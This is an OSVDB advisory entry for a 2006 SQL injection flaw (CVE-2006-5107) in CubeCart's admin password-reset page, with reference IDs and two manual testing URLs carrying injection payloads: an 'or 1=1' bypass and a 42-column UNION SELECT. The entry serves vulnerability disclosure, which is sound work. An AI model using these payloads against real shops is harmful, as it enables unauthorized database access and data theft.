CubeCart admin/forgot_pass.php user_name Variable SQL Injection

2006-09-25T13:49:00
ID OSVDB:29242
Type osvdb
Reporter HACKERS PAL (security@soqor.net)
Modified 2006-09-25T13:49:00

Description

Manual Testing Notes

/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*

/admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*

References:

Secunia Advisory ID: 22175
Related OSVDB ID: 29243
Related OSVDB ID: 29245
Related OSVDB ID: 29317
Related OSVDB ID: 29244
Related OSVDB ID: 29246
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0422.html
ISS X-Force ID: 29176
CVE-2006-5107
Bugtraq ID: 20215